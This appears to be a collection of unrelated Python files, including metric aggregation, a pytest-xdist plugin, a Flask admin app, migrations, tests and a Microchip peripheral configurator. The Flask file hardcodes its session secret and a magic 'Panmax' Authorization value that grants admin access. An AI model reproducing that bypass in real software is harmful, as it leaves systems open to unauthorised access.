'kl_div_censi': kl_div_censi,
'kl_div_mc_65': kl_div_mc_65,
'kl_div_prop': kl_div_prop,
'kl_div_base': kl_div_base,
'nne_censi': nne_censi,
'nne_mc_65': nne_mc_65,
'nne_prop': nne_prop,
'nne_base': nne_base,
'cov_censi': cov_censi,
'cov_prop': cov_prop,
'cov_ut': cov_ut,
'cov_cross': cov_cross,
'cov_mc': cov_mc,
'cov_mc_65': cov_mc_65,
'T_true': T_init,
'T_mc': T_mc,
'T_init_mc': T_init_mc,
'cov_base': cov_base,
}
dataset.dump(metrics, f_metrics)
def results_latex(dataset, sequence, scan_ref):
base_path = os.path.join(Param.results_path, sequence, str(scan_ref))
f_metrics = os.path.join(base_path, 'metrics.p')
metrics = dataset.load(f_metrics)
T_mc = metrics['T_mc']
T_init_mc = metrics['T_init_mc']
T_true = metrics['T_true']
cov_censi = metrics['cov_censi']
cov_prop = metrics['cov_prop']
cov_mc_65 = metrics['cov_mc_65']
file_name = os.path.join(Param.latex_path, sequence + str(scan_ref) + 'mc.txt')
header = "x_mc y_mc x_mc_init y_mc_init"
data = np.zeros((T_mc.shape[0], 4))
data[:, :2] = T_mc[:, :2, 3]
data[:, 2:] = T_init_mc[:, :2, 3]
np.savetxt(file_name, data, comments='', header=header)
file_name = os.path.join(Param.latex_path, sequence + str(scan_ref) + 'T.txt')
header = "x_true y_true"
data = np.zeros((1, 2))
data[0, 0] = T_true[0, 3]
data[0, 1] = T_true[1, 3]
np.savetxt(file_name, data, comments='', header=header)
file_name = os.path.join(Param.latex_path, sequence + str(scan_ref) + 'Q.txt')
header = "x_censi y_censi x_mc65 y_mc65 x_prop y_prop"
xy_censi = plots.contour_ellipse(T_true, cov_censi, sigma=3, alpha=0.1)
xy_prop = plots.contour_ellipse(T_true, cov_prop, sigma=3, alpha=0.1)
xy_mc_65 = plots.contour_ellipse(T_true, cov_mc_65, sigma=3, alpha=0.1)
n_min = np.min([150, xy_prop.shape[0], xy_censi.shape[0], xy_mc_65.shape[0]])
xy_prop = xy_prop[np.linspace(0, xy_prop.shape[0]-1, n_min, dtype=int)]
xy_censi = xy_censi[np.linspace(0, xy_censi.shape[0]-1, n_min, dtype=int)]
xy_mc_65 = xy_mc_65[np.linspace(0, xy_mc_65.shape[0]-1, n_min, dtype=int)]
data = np.zeros((xy_censi.shape[0], 6))
data[:, :2] = xy_censi
data[:, 2:4] = xy_mc_65
data[:, 4:] = xy_prop
np.savetxt(file_name, data, comments='', header=header)
def aggregate_results(dataset):
kl_div_censi = np.zeros(2)
kl_div_base = np.zeros(2)
kl_div_mc_65 = np.zeros(2)
kl_div_prop = np.zeros(2)
nne_censi = np.zeros(2)
nne_mc_65 = np.zeros(2)
nne_prop = np.zeros(2)
nne_base = np.zeros(2)
n_tot = 0
for sequence in dataset.sequences:
T_gt = dataset.get_data(sequence)
kl_div_censi_seq = np.zeros((T_gt.shape[0]-1, 2))
kl_div_mc_65_seq = np.zeros((T_gt.shape[0]-1, 2))
kl_div_prop_seq = np.zeros((T_gt.shape[0]-1, 2))
kl_div_base_seq = np.zeros((T_gt.shape[0]-1, 2))
nne_censi_seq = np.zeros((T_gt.shape[0]-1, 2))
nne_mc_65_seq = np.zeros((T_gt.shape[0]-1, 2))
nne_prop_seq = np.zeros((T_gt.shape[0]-1, 2))
nne_base_seq = np.zeros((T_gt.shape[0]-1, 2))
n_tot += T_gt.shape[0]-1
cov_base = np.zeros((6, 6))
for n in range(T_gt.shape[0]-1):
base_path = os.path.join(Param.results_path, sequence, str(n))
f_metrics = os.path.join(base_path, 'metrics.p')
metrics = dataset.load(f_metrics)
cov_base += metrics['cov_mc']
cov_base /= T_gt.shape[0]-1
metrics = {'cov_base': cov_base}
base_path = os.path.join(Param.results_path, sequence)
f_metrics = os.path.join(base_path, 'base.p')
dataset.dump(metrics, f_metrics)
for n in range(T_gt.shape[0]-1):
base_path = os.path.join(Param.results_path, sequence, str(n))
f_metrics = os.path.join(base_path, 'metrics.p')
metrics = dataset.load(f_metrics)
if sequence == dataset.sequences[0] and (n == 3 or n == 14):
continue
kl_div_censi_seq[n] = metrics['kl_div_censi']
kl_div_mc_65_seq[n] = metrics['kl_div_mc_65']
kl_div_prop_seq[n] = metrics['kl_div_prop']
kl_div_base_seq[n] = metrics['kl_div_base']
nne_censi_seq[n] = metrics['nne_censi']
nne_mc_65_seq[n] = metrics['nne_mc_65']
nne_prop_seq[n] = metrics['nne_prop']
nne_base_seq[n] = metrics['nne_base']
print(sequence, n, metrics['nne_prop'])
seuil_up = int(1*(T_gt.shape[0]-1))
seuil_low = T_gt.shape[0]-1 - seuil_up
kl_div_censi_seq = np.sort(kl_div_censi_seq.T).T
kl_div_mc_65_seq = np.sort(kl_div_mc_65_seq.T).T
kl_div_prop_seq = np.sort(kl_div_prop_seq.T).T
kl_div_base_seq = np.sort(kl_div_base_seq.T).T
kl_div_censi_seq = np.sum(kl_div_censi_seq[seuil_low:seuil_up], 0)
kl_div_mc_65_seq = np.sum(kl_div_mc_65_seq[seuil_low:seuil_up], 0)
kl_div_prop_seq = np.sum(kl_div_prop_seq[seuil_low:seuil_up], 0)
kl_div_base_seq = np.sum(kl_div_base_seq[seuil_low:seuil_up], 0)
nne_censi_seq = np.sort(nne_censi_seq.T).T
nne_mc_65_seq = np.sort(nne_mc_65_seq.T).T
nne_prop_seq = np.sort(nne_prop_seq.T).T
nne_base_seq = np.sort(nne_base_seq.T).T
nne_censi_seq = np.sum(nne_censi_seq[seuil_low:seuil_up], 0)
nne_mc_65_seq = np.sum(nne_mc_65_seq[seuil_low:seuil_up], 0)
nne_prop_seq = np.sum(nne_prop_seq[seuil_low:seuil_up], 0)
nne_base_seq = np.sum(nne_base_seq[seuil_low:seuil_up], 0)
kl_div_censi += kl_div_censi_seq
kl_div_mc_65 += kl_div_mc_65_seq
kl_div_prop += kl_div_prop_seq
kl_div_base += kl_div_base_seq
nne_censi += nne_censi_seq
nne_mc_65 += nne_mc_65_seq
nne_prop += nne_prop_seq
nne_base += nne_base_seq
tmp = seuil_up - seuil_low
kl_div_censi_seq /= tmp
kl_div_mc_65_seq /= tmp
kl_div_prop_seq /= tmp
kl_div_base_seq /= tmp
nne_censi_seq /= tmp
nne_mc_65_seq /= tmp
nne_prop_seq /= tmp
nne_base_seq /= tmp
nne_censi_seq = np.sqrt(nne_censi_seq)
nne_mc_65_seq = np.sqrt(nne_mc_65_seq)
nne_prop_seq = np.sqrt(nne_prop_seq)
nne_base_seq = np.sqrt(nne_base_seq)
# display results
print('Covariance results for sequence ' + sequence)
print(' Kullback-Leibler divergence')
print(' -translation')
print(' -Censi: {:.3f}'.format(kl_div_censi_seq[1]))
print(' -Monte-Carlo 65: {:.3f}'.format(kl_div_mc_65_seq[1]))
print(' -proposed: {:.3f}'.format(kl_div_prop_seq[1]))
print(' -base: {:.3f}'.format(kl_div_base_seq[1]))
print(' -rotation')
print(' -Censi: {:.3f}'.format(kl_div_censi_seq[0]))
print(' -Monte-Carlo 65: {:.3f}'.format(kl_div_mc_65_seq[0]))
print(' -proposed: {:.3f}'.format(kl_div_prop_seq[0]))
print(' -base: {:.3f}'.format(kl_div_base_seq[0]))
print(' Normalized Norm Error')
print(' -translation')
print(' -Censi: {:.3f}'.format(nne_censi_seq[1]))
print(' -Monte-Carlo 65: {:.3f}'.format(nne_mc_65_seq[1]))
print(' -proposed: {:.3f}'.format(nne_prop_seq[1]))
print(' -base: {:.3f}'.format(nne_base_seq[1]))
print(' -rotation')
print(' -Censi: {:.3f}'.format(nne_censi_seq[0]))
print(' -Monte-Carlo 65: {:.3f}'.format(nne_mc_65_seq[0]))
print(' -proposed: {:.3f}'.format(nne_prop_seq[0]))
print(' -base: {:.3f}'.format(nne_base_seq[0]))
kl_div_censi /= n_tot
kl_div_mc_65 /= n_tot
kl_div_prop /= n_tot
kl_div_base /= n_tot
nne_censi /= n_tot
nne_mc_65 /= n_tot
nne_prop /= n_tot
nne_base /= n_tot
nne_censi = np.sqrt(nne_censi)
nne_mc_65 = np.sqrt(nne_mc_65)
nne_prop = np.sqrt(nne_prop)
nne_base = np.sqrt(nne_prop)
# display results
print('Covariance results')
print(' Kullback-Leibler divergence')
print(' -translation')
print(' -Censi: {:.3f}'.format(kl_div_censi[1]))
print(' -Monte-Carlo 65: {:.3f}'.format(kl_div_mc_65[1]))
print(' -proposed: {:.3f}'.format(kl_div_prop[1]))
print(' -base: {:.3f}'.format(kl_div_base[1]))
print(' -rotation')
print(' -Censi: {:.3f}'.format(kl_div_censi[0]))
print(' -Monte-Carlo 65: {:.3f}'.format(kl_div_mc_65[0]))
print(' -proposed: {:.3f}'.format(kl_div_prop[0]))
print(' -base: {:.3f}'.format(kl_div_base[0]))
print(' Normalized Norm Error')
print(' -translation')
print(' -Censi: {:.3f}'.format(nne_censi[1]))
print(' -Monte-Carlo 65: {:.3f}'.format(nne_mc_65[1]))
print(' -proposed: {:.3f}'.format(nne_prop[1]))
print(' -base: {:.3f}'.format(nne_base[1]))
print(' -rotation')
print(' -Censi: {:.3f}'.format(nne_censi[0]))
print(' -Monte-Carlo 65: {:.3f}'.format(nne_mc_65[0]))
print(' -proposed: {:.3f}'.format(nne_prop[0]))
print(' -base: {:.3f}'.format(nne_base[0]))
|
"""
tests.fixtures.listings
"""
from apartmentbot.models import Listing
listing_data = {
'id': 'h23idk9i3r8349hufi3hr2eu',
'url': 'https://www.listing.net',
'name': 'New Listing! Great Location!',
'geotag': (42.49835, 71.23898),
'price': '$1,500',
}
def listing() -> Listing:
return Listing.schema().load(listing_data)
|
__version__ = "0.80.0"
version = tuple(map(int, __version__.split('.'))) # pylint: disable=invalid-name
|
import os
import py
import pytest
def auto_detect_cpus():
try:
from os import sched_getaffinity
except ImportError:
if os.environ.get("TRAVIS") == "true":
# workaround https://bitbucket.org/pypy/pypy/issues/2375
return 2
try:
from os import cpu_count
except ImportError:
from multiprocessing import cpu_count
else:
def cpu_count():
return len(sched_getaffinity(0))
try:
n = cpu_count()
except NotImplementedError:
return 1
return n if n else 1
def parse_numprocesses(s):
if s == "auto":
return auto_detect_cpus()
else:
return int(s)
def pytest_addoption(parser):
group = parser.getgroup("xdist", "distributed and subprocess testing")
group._addoption(
"-n",
"--numprocesses",
dest="numprocesses",
metavar="numprocesses",
action="store",
type=parse_numprocesses,
help="shortcut for '--dist=load --tx=NUM*popen', "
"you can use 'auto' here for auto detection CPUs number on "
"host system",
)
group.addoption(
"--max-worker-restart",
"--max-slave-restart",
action="store",
default=None,
dest="maxworkerrestart",
help="maximum number of workers that can be restarted "
"when crashed (set to zero to disable this feature)\n"
"'--max-slave-restart' option is deprecated and will be removed in "
"a future release",
)
group.addoption(
"--dist",
metavar="distmode",
action="store",
choices=["each", "load", "loadscope", "loadfile", "no"],
dest="dist",
default="no",
help=(
"set mode for distributing tests to exec environments.\n\n"
"each: send each test to all available environments.\n\n"
"load: load balance by sending any pending test to any"
" available environment.\n\n"
"loadscope: load balance by sending pending groups of tests in"
" the same scope to any available environment.\n\n"
"loadfile: load balance by sending test grouped by file"
" to any available environment.\n\n"
"(default) no: run tests inprocess, don't distribute."
),
)
group.addoption(
"--tx",
dest="tx",
action="append",
default=[],
metavar="xspec",
help=(
"add a test execution environment. some examples: "
"--tx popen//python=python2.5 --tx socket=192.168.1.102:8888 "
"--tx ssh=user@codespeak.net//chdir=testcache"
),
)
group._addoption(
"-d",
action="store_true",
dest="distload",
default=False,
help="load-balance tests. shortcut for '--dist=load'",
)
group.addoption(
"--rsyncdir",
action="append",
default=[],
metavar="DIR",
help="add directory for rsyncing to remote tx nodes.",
)
group.addoption(
"--rsyncignore",
action="append",
default=[],
metavar="GLOB",
help="add expression for ignores when rsyncing to remote tx nodes.",
)
group.addoption(
"--boxed",
action="store_true",
help="backward compatibility alias for pytest-forked --forked",
)
parser.addini(
"rsyncdirs",
"list of (relative) paths to be rsynced for" " remote distributed testing.",
type="pathlist",
)
parser.addini(
"rsyncignore",
"list of (relative) glob-style paths to be ignored " "for rsyncing.",
type="pathlist",
)
parser.addini(
"looponfailroots",
type="pathlist",
help="directories to check for changes",
default=[py.path.local()],
)
# -------------------------------------------------------------------------
# distributed testing hooks
# -------------------------------------------------------------------------
def pytest_addhooks(pluginmanager):
from xdist import newhooks
# avoid warnings with pytest-2.8
method = getattr(pluginmanager, "add_hookspecs", None)
if method is None:
method = pluginmanager.addhooks
method(newhooks)
# -------------------------------------------------------------------------
# distributed testing initialization
# -------------------------------------------------------------------------
@pytest.mark.trylast
def pytest_configure(config):
if config.getoption("dist") != "no" and not config.getvalue("collectonly"):
from xdist.dsession import DSession
session = DSession(config)
config.pluginmanager.register(session, "dsession")
tr = config.pluginmanager.getplugin("terminalreporter")
tr.showfspath = False
if config.getoption("boxed"):
config.option.forked = True
@pytest.mark.tryfirst
def pytest_cmdline_main(config):
if config.option.numprocesses:
if config.option.dist == "no":
config.option.dist = "load"
config.option.tx = ["popen"] * config.option.numprocesses
if config.option.distload:
config.option.dist = "load"
val = config.getvalue
if not val("collectonly"):
usepdb = config.getoption("usepdb") # a core option
if val("dist") != "no":
if usepdb:
raise pytest.UsageError(
"--pdb is incompatible with distributing tests; try using -n0."
) # noqa: E501
# -------------------------------------------------------------------------
# fixtures
# -------------------------------------------------------------------------
@pytest.fixture(scope="session")
def worker_id(request):
"""Return the id of the current worker ('gw0', 'gw1', etc) or 'master'
if running on the master node.
"""
if hasattr(request.config, "workerinput"):
return request.config.workerinput["workerid"]
else:
return "master"
|
# coding: utf-8
from datetime import datetime
from flask import Flask
from flask import render_template
from flask.ext.login import LoginManager
from leancloud.errors import LeanCloudError
from leancloud.query import Query
from leancloud.user import User
from models.auth_token import AuthToken
from models.user import Admin
import logging
app = Flask(__name__)
logging.basicConfig(level=logging.DEBUG)
from views.todos import todos_view
app.register_blueprint(todos_view, url_prefix='/todos')
from admin_views import admin_view
app.register_blueprint(admin_view, url_prefix='/admin')
from api_v1 import api_v1_bp
app.register_blueprint(api_v1_bp, url_prefix='/v1')
app.secret_key = 'ihaoyisheng'
login_manager = LoginManager()
login_manager.init_app(app)
login_manager.login_view = '.login'
@login_manager.user_loader
def load_user(user_id):
try:
admin = Query(Admin).get(user_id)
except LeanCloudError:
admin = None
return admin
@login_manager.request_loader
def load_user_from_request(request):
access_token = request.headers.get('Authorization')
if access_token:
if access_token == "Panmax":
user = Query(User).equal_to("username", "jiapan").first()
admin = Query(Admin).equal_to("user", user).first()
return admin
try:
token = Query(AuthToken).equal_to("access_token", access_token).greater_than("expires_time", datetime.now()).first()
except LeanCloudError:
return None
else:
user = token.get('user')
user.fetch()
admin = Query(Admin).equal_to("user", user).first()
return admin
return None
@app.route('/')
def index():
return render_template('index.html')
@app.route('/time')
def time():
return str(datetime.now())
|
"""empty message
Revision ID: 385d83d68b71
Revises: 5a3a877698c8
Create Date: 2021-01-08 17:09:07.858288
"""
from alembic import op
import sqlalchemy as sa
# revision identifiers, used by Alembic.
revision = '385d83d68b71'
down_revision = '5a3a877698c8'
branch_labels = None
depends_on = None
def upgrade():
# ### commands auto generated by Alembic - please adjust! ###
op.create_table('uri_prefix',
sa.Column('id', sa.Integer(), nullable=False),
sa.Column('value', sa.String(), nullable=False),
sa.Column('last_checked', sa.DateTime(), nullable=True),
sa.PrimaryKeyConstraint('id'),
sa.UniqueConstraint('value')
)
op.add_column('error', sa.Column('uri_prefix_id', sa.Integer(), nullable=True))
op.alter_column('error', 'origin',
existing_type=sa.INTEGER(),
nullable=True)
op.alter_column('error', 'uri_id',
existing_type=sa.INTEGER(),
nullable=True)
op.create_foreign_key('error_uri_prefix_id_fkey', 'error', 'uri_prefix', ['uri_prefix_id'], ['id'])
op.add_column('uri', sa.Column('prefix', sa.String(), nullable=True))
op.create_foreign_key('uri_prefix_fkey', 'uri', 'uri_prefix', ['prefix'], ['value'])
# ### end Alembic commands ###
def downgrade():
# ### commands auto generated by Alembic - please adjust! ###
op.drop_constraint('uri_prefix_fkey', 'uri', type_='foreignkey')
op.drop_column('uri', 'prefix')
op.drop_constraint('error_uri_prefix_id_fkey', 'error', type_='foreignkey')
op.alter_column('error', 'uri_id',
existing_type=sa.INTEGER(),
nullable=False)
op.alter_column('error', 'origin',
existing_type=sa.INTEGER(),
nullable=False)
op.drop_column('error', 'uri_prefix_id')
op.drop_table('uri_prefix')
# ### end Alembic commands ###
|
import sys
from time import sleep
import cloudsigma
snapshot = cloudsigma.resource.Snapshot()
snapshot_done = False
if len(sys.argv) < 3:
print('\nUsage: ./snapshot.py drive-uuid snapshot-name\n')
sys.exit(1)
snapshot_data = {
'drive': sys.argv[1],
'name': sys.argv[2],
}
create_snapshot = snapshot.create(snapshot_data)
while not snapshot_done:
snapshot_status = snapshot.get(create_snapshot['uuid'])
if snapshot_status['status'] == 'available':
snapshot_done = True
print('\nSnapshot successfully created\n')
else:
sleep(1)
|
class JSONSerializable:
def toJSON(self):
pass
class Ownership(JSONSerializable):
def __init__(self, investor, shares, cash_paid, ownership):
self.investor = investor
self.shares = shares
self.cash_paid = cash_paid
self.ownership = ownership
def toJSON(self):
return {
"investor": self.investor,
"shares": int(self.shares),
"cash_paid": float(self.cash_paid),
"ownership": float(self.ownership)
}
class Investment(JSONSerializable):
def __init__(self, date, total_number_of_shares, cash_raised):
self.date = date
self.total_number_of_shares = total_number_of_shares
self.cash_raised = cash_raised
self.ownership = []
def toJSON(self):
output = {}
segments = self.date.split('-')
output['date'] = '/'.join([segments[1], segments[2], segments[0]])
output['total_number_of_shares'] = float(self.total_number_of_shares)
output['cash_raised'] = int(self.cash_raised)
output['ownership'] = [o.toJSON() for o in self.ownership]
return output
|
import pytest
from vartoml import VarToml
@pytest.fixture
def vtoml():
return VarToml()
def test_simple(vtoml):
"""A simple TOML document without any variables
This works the same as when using the `toml` package
without any extensions
"""
tomls_str = """
[default]
h = "/home"
"""
toml = vtoml.loads(tomls_str)
assert vtoml.get('default', 'h') == '/home'
def test_vartoml1(vtoml):
"""A simple TOML document using variables """
tomls_str = """
[default]
h = "/home"
m = "${default:h}/manfred"
b = "${default:m}/bin"
[other]
server = "${default:b}/server"
"""
vtoml.loads(tomls_str)
assert vtoml.get('other', 'server') == '/home/manfred/bin/server'
def test_vartoml2(vtoml):
""" test with variable names containing digits, underscores and dashes"""
tomls_str = """
[default]
_h = "/home"
-m = "${default:_h}/manfred"
b = "${default:-m}/bin"
"""
vtoml.loads(tomls_str)
assert vtoml.get('default', 'b') == '/home/manfred/bin'
def test_nested(vtoml):
""" test with variable names containing digits, underscores and dashes"""
tomls_str = """
[products.food]
type = "cake"
[test]
mytype = "${products:food:type}"
"""
vtoml.loads(tomls_str)
assert vtoml.get('test', 'mytype') == "cake"
assert vtoml.get('products', 'food', 'type') == "cake"
def test_vartoml3(vtoml):
""" test with variable names containing digits, underscores and dashes"""
tomls_str = """
[default]
1h = "/home"
-m = "${default:1h}/manfred"
b = "${default:-m}/bin"
"""
vtoml.loads(tomls_str)
assert vtoml.get('default', 'b') == '/home/manfred/bin'
|
# -*- coding: utf-8 -*-
# vim:fenc=utf-8
'''
data informations
-----------------
:copyright (c) 2014 Xavier Bruhiere.
:license: Apache2.0, see LICENSE for more details.
'''
"""
# World exchanges caracteristics
Exchanges = {
# Market code, from yahoo stock code to google market code (needed for
# reliable download)
# Later Londres = LON
#FIXME Forex is temporary
'cac40': {'symbol': '^FCHI',
'timezone': 'Europe/London',
'code': 1001,
'google_market': 'EPA'},
'forex': {'symbol': '^GSPC',
'timezone': 'US/Eastern',
'code': 1002,
'indexes': []},
'nasdaq': {'symbol': '^GSPC',
'timezone': 'US/Eastern',
'code': 1003,
'indexes': ['nasdaq', 'nyse'],
'google_market': 'NASDAQ'},
'nyse': {'symbol': '^GSPC',
'timezone': 'US/Eastern',
'code': 1004,
'google_market': 'NYSE'}
}
"""
yahooCode = {'ask': 'a', 'average daily volume': 'a2', 'ask size': 'a5',
'bid': 'b', 'ask rt': 'b2', 'bid rt': 'b3', 'dividend yield': 'y',
'book value': 'b4', 'bid size': 'b6', 'change and percent': 'c',
'change': 'c1', 'commission': 'c3', 'change rt': 'c6',
'after hours change rt': 'c8', 'dividend': 'd',
'last trade date': 'd1', 'trade date': 'd2', 'earnings': 'e',
'error': 'e1', 'eps estimate year': 'e7',
'eps estimate next year': 'e8', 'eps estimate next quarter': 'e9',
'float shares': 'f6', 'day low': 'g', 'day high': 'h',
'52-week low': 'j', '52-week high': 'k',
'holdings gain percent': 'g1', 'annualized gain': 'g3',
'holdings gain': 'g4', 'holdings gain percent rt': 'g5',
'holdings gain rt': 'g6', 'more info': 'i', 'order book rt': 'i5',
'market capitalization': 'j1', 'market cap rt': 'j3',
'EBITDA': 'j4', 'change from 52-week': 'j5',
'percent change from 52-week low': 'j6',
'last trade rt with time': 'k1', 'change percent rt': 'k2',
'last trade size': 'k3', 'change from 52-week high': 'k4',
'percent change from 52-week high': 'k5',
'last trade with time': 'l', 'last trade price': 'l1',
'high limit': 'l2', 'low limit': 'l3', 'day range': 'm',
'day range rt': 'm2', '50-day ma': 'm3', '200-day ma': 'm4',
'percent change from 50-day ma': 'm8', 'name': 'n', 'notes': 'n4',
'open': 'o', 'previous close': 'p', 'price paid': 'p1',
'change percent': 'p2', 'price/sales': 'p5', 'price/book': 'p6',
'ex-dividend date': 'q', 'p/e ratio': 'r', 'dividend date': 'r1',
'p/e ratio rt': 'r2', 'peg ratio': 'r5',
'price/eps estimate year': 'r6',
'price/eps estimate next year': 'r7', 'symbol': 's',
'shares owned': 's1', 'short ratio': 's7',
'last trade time': 't1', 'trade links': 't6',
'ticker trend': 't7', '1 year target price': 't8', 'volume': 'v',
'holdings value': 'v1', 'holdings value rt': 'v7',
'52-week range': 'w', 'day value change': 'w1',
'day value change rt': 'w4', 'stock exchange': 'x'}
|
"""*****************************************************************************
* Copyright (C) 2019 Microchip Technology Inc. and its subsidiaries.
*
* Subject to your compliance with these terms, you may use Microchip software
* and any derivatives exclusively with Microchip products. It is your
* responsibility to comply with third party license terms applicable to your
* use of third party software (including open source software) that may
* accompany Microchip software.
*
* THIS SOFTWARE IS SUPPLIED BY MICROCHIP "AS IS". NO WARRANTIES, WHETHER
* EXPRESS, IMPLIED OR STATUTORY, APPLY TO THIS SOFTWARE, INCLUDING ANY IMPLIED
* WARRANTIES OF NON-INFRINGEMENT, MERCHANTABILITY, AND FITNESS FOR A
* PARTICULAR PURPOSE.
*
* IN NO EVENT WILL MICROCHIP BE LIABLE FOR ANY INDIRECT, SPECIAL, PUNITIVE,
* INCIDENTAL OR CONSEQUENTIAL LOSS, DAMAGE, COST OR EXPENSE OF ANY KIND
* WHATSOEVER RELATED TO THE SOFTWARE, HOWEVER CAUSED, EVEN IF MICROCHIP HAS
* BEEN ADVISED OF THE POSSIBILITY OR THE DAMAGES ARE FORESEEABLE. TO THE
* FULLEST EXTENT ALLOWED BY LAW, MICROCHIP'S TOTAL LIABILITY ON ALL CLAIMS IN
* ANY WAY RELATED TO THIS SOFTWARE WILL NOT EXCEED THE AMOUNT OF FEES, IF ANY,
* THAT YOU HAVE PAID DIRECTLY TO MICROCHIP FOR THIS SOFTWARE.
*****************************************************************************"""
################################################################################
#### Register Information ####
################################################################################
cmpRegGroup = ATDF.getNode('/avr-tools-device-file/modules/module@[name="CMP"]/register-group@[name="CMP"]').getChildren()
cmpValGrp_CM1CON_CCH = ATDF.getNode('/avr-tools-device-file/modules/module@[name="CMP"]/value-group@[name="CM1CON__CCH"]')
cmpValGrp_CM1CON_CREF = ATDF.getNode('/avr-tools-device-file/modules/module@[name="CMP"]/value-group@[name="CM1CON__CREF"]')
cmpValGrp_CM1CON_EVPOL = ATDF.getNode('/avr-tools-device-file/modules/module@[name="CMP"]/value-group@[name="CM1CON__EVPOL"]')
cmpValGrp_CM2CON_CREF = ATDF.getNode('/avr-tools-device-file/modules/module@[name="CMP"]/value-group@[name="CM2CON__CREF"]')
cmpValGrp_CM2CON_CCH = ATDF.getNode('/avr-tools-device-file/modules/module@[name="CMP"]/value-group@[name="CM2CON__CCH"]')
cmpValGrp_CM2CON_EVPOL = ATDF.getNode('/avr-tools-device-file/modules/module@[name="CMP"]/value-group@[name="CM2CON__EVPOL"]')
cmpBitFld_CM1CON_CCH = ATDF.getNode('/avr-tools-device-file/modules/module@[name="CMP"]/register-group@[name="CMP"]/register@[name="CM1CON"]/bitfield@[name="CCH"]')
cmpBitFld_CM1CON_CREF = ATDF.getNode('/avr-tools-device-file/modules/module@[name="CMP"]/register-group@[name="CMP"]/register@[name="CM1CON"]/bitfield@[name="CREF"]')
cmpBitFld_CM1CON_EVPOL = ATDF.getNode('/avr-tools-device-file/modules/module@[name="CMP"]/register-group@[name="CMP"]/register@[name="CM1CON"]/bitfield@[name="EVPOL"]')
cmpBitFld_CM1CON_CPOL = ATDF.getNode('/avr-tools-device-file/modules/module@[name="CMP"]/register-group@[name="CMP"]/register@[name="CM1CON"]/bitfield@[name="CPOL"]')
cmpBitFld_CM1CON_COE = ATDF.getNode('/avr-tools-device-file/modules/module@[name="CMP"]/register-group@[name="CMP"]/register@[name="CM1CON"]/bitfield@[name="COE"]')
cmpBitFld_CMSTAT_SIDL = ATDF.getNode('/avr-tools-device-file/modules/module@[name="CMP"]/register-group@[name="CMP"]/register@[name="CMSTAT"]/bitfield@[name="SIDL"]')
################################################################################
#### Global Variables ####
################################################################################
global interruptsChildren
interruptsChildren = ATDF.getNode('/avr-tools-device-file/devices/device/interrupts').getChildren()
################################################################################
#### Business Logic ####
################################################################################
def setCMPxInterruptData(status, index):
Database.setSymbolValue("core", InterruptVector[index - 1], status, 1)
Database.setSymbolValue("core", InterruptHandlerLock[index - 1], status, 1)
interruptName = InterruptHandler[index - 1].split("_INTERRUPT_HANDLER")[0]
if status == True:
Database.setSymbolValue("core", InterruptHandler[index - 1], interruptName + "_InterruptHandler", 1)
else:
Database.setSymbolValue("core", InterruptHandler[index - 1], interruptName + "_Handler", 1)
def updateCMPxInterruptData(symbol, event):
symbolId = symbol.getID()
cmp_id = int((symbolId.replace("CMP", "")).replace("_INTERRUPT_ENABLE_COMMENT", ""))
status = int(cmpSym_CMxCON_EVPOL[cmp_id - 1].getSelectedValue()) != 0
if event["id"] == "CMP_CM" + str(cmp_id) + "CON_EVPOL":
setCMPxInterruptData(status, cmp_id)
if Database.getSymbolValue("core", InterruptVectorUpdate[cmp_id - 1].replace("core.", "")) == True and status == True:
symbol.setVisible(True)
else:
symbol.setVisible(False)
def _get_enblReg_parms(vectorNumber):
# This takes in vector index for interrupt, and returns the IECx register name as well as
# mask and bit location within it for given interrupt
index = int(vectorNumber / 32)
regName = "IEC" + str(index)
return regName
def _get_statReg_parms(vectorNumber):
# This takes in vector index for interrupt, and returns the IFSx register name as well as
# mask and bit location within it for given interrupt
index = int(vectorNumber / 32)
regName = "IFS" + str(index)
return regName
def _get_bitfield_names(node, outputList):
valueNodes = node.getChildren()
for bitfield in reversed(valueNodes): ## do this for all <value > entries for this bitfield
dict = {}
if bitfield.getAttribute("caption").lower() != "reserved": ## skip (unused) reserved fields
dict["desc"] = bitfield.getAttribute("caption")
dict["key"] = bitfield.getAttribute("caption")
## Get rid of leading '0x', and convert to int if was hex
value = bitfield.getAttribute("value")
if(value[:2] == "0x"):
temp = value[2:]
tempint = int(temp, 16)
else:
tempint = int(value)
dict["value"] = str(tempint)
outputList.append(dict)
def combineValues(symbol, event):
symbolId = symbol.getID()
cmp_id = int((symbolId.replace("CM", "")).replace("CON_VALUE", "")) - 1
cchValue = cmpSym_CMxCON_CCH[cmp_id].getValue() << 0
crefValue = cmpSym_CMxCON_CREF[cmp_id].getValue() << 4
evpolValue = cmpSym_CMxCON_EVPOL[cmp_id].getValue() << 6
cpolValue = cmpSym_CMxCON_CPOL[cmp_id].getValue() << 13
coeValue = cmpSym_CMxCON_COE[cmp_id].getValue() << 14
cmconValue = crefValue + cchValue + evpolValue + cpolValue + coeValue
symbol.setValue(cmconValue, 2)
def getIRQIndex(string):
irq_index = "-1"
for param in interruptsChildren:
if "irq-index" in param.getAttributeList():
name = str(param.getAttribute("name"))
if string == name:
irq_index = str(param.getAttribute("irq-index"))
break
else:
break
return irq_index
def getVectorIndex(string):
vector_index = "-1"
for param in interruptsChildren:
name = str(param.getAttribute("name"))
if string == name:
vector_index = str(param.getAttribute("index"))
break
return vector_index
def updateCMPxClockWarningStatus(symbol, event):
symbol.setVisible(not event["value"])
################################################################################
#### Component ####
################################################################################
def instantiateComponent(cmpComponent):
global cmpInstanceName
global InterruptVector
global InterruptHandlerLock
global InterruptHandler
global InterruptVectorUpdate
global cmpSym_CMxCON_CREF
global cmpSym_CMxCON_CCH
global cmpSym_CMxCON_EVPOL
global cmpSym_CMxCON_CPOL
global cmpSym_CMxCON_COE
InterruptVector = []
InterruptHandler = []
InterruptHandlerLock = []
InterruptVectorUpdate = []
cmpSym_CMxCON_CREF = []
cmpSym_CMxCON_CCH = []
cmpSym_CMxCON_EVPOL = []
cmpSym_CMxCON_CPOL = []
cmpSym_CMxCON_COE = []
cmpInstanceName = cmpComponent.createStringSymbol("CMP_INSTANCE_NAME", None)
cmpInstanceName.setVisible(False)
cmpInstanceName.setDefaultValue(cmpComponent.getID().upper())
#Stop in Idle mode
if cmpBitFld_CMSTAT_SIDL != None:
cmpSym_CMSTAT_SIDL = cmpComponent.createBooleanSymbol("CMP_CMSTAT_SIDL", None)
cmpSym_CMSTAT_SIDL.setLabel(cmpBitFld_CMSTAT_SIDL.getAttribute("caption"))
cmpSym_CMSTAT_SIDL.setDefaultValue(False)
index = 1
for register in cmpRegGroup:
regName = str(register.getAttribute("name"))
if regName.startswith("CM") and regName.endswith("CON"):
index = int((regName.replace("CM", "")).replace("CON", ""))
